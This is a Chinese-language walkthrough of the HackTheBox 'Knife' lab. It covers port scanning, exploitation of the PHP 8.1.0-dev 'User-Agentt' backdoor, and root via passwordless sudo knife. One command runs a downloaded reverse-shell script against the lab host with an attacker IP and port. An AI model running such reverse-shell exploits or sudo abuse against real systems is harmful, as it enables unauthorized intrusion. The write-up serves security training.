Linux/Knife

Knife

Enumeration

nmap

第一次扫描发现系统对外开放了22和80端口,端口详细信息如下

系统对外开放了2个端口,22的ssh和80的http,先访问web看看

单看该服务,并没有发现有趣的东西,wappalyzer显示php版本为8.1.0

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution

搜索发现该版本php存在后门漏洞,可以远程执行代码

首先将该漏洞利用脚本下载到工作目录,我这里用了github的脚本

然后执行python脚本,输入url,本机ip,设置监听端口,在本地开启监听,然后执行python脚本

复制代码
usage: revshell_php_8.1.0-dev.py [-h] <target URL> <attacker IP> <attacker PORT> python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.3 4444

在python执行界面中没有反应,但是监听端获取到shell

Privilege Escalation

直接使用sudo -l发现可以使用root权限执行knife程序,且不需要密码

在gtfobins中发现knife可以利用,如图

执行指令即可获取root权限

相关推荐
Lhappy嘻嘻4 小时前
Java IO|File 文件操作 + 字节流 / 字符流完整笔记 + 递归删除文件实战
java·笔记·php
Championship.23.244 小时前
Linux 3.0 锁机制与故障排查详解
linux·运维·服务器
天疆说4 小时前
Zotero Connector 在 Edge 里找不到桌面 Zotero(Linux / Zotero 9.0.6 / Edge 150)
linux·前端·edge
风123456789~6 小时前
【Linux专栏】ls 排除某个文件
linux·运维·服务器
IT曙光6 小时前
ubuntu apt-get离线源制作
linux·ubuntu
2601_963771376 小时前
How to Scale Your WordPress Store Traffic in 2026
前端·php·plugin
其实防守也摸鱼7 小时前
运维--学习阶段问题解答(1)(自测)
linux·运维·服务器·数据库·学习·自动化·命令模式
懒鸟一枚7 小时前
深入理解 Linux 内存、Swap 交换分区与分页机制的关系
java·linux·数据库
Darkwanderor8 小时前
对Linux的进程控制的研究
linux·运维·c++
零零信安9 小时前
AI智能体,攻守失衡的催化剂 | 零零信安
人工智能·网络安全·数据泄露·暗网·零零信安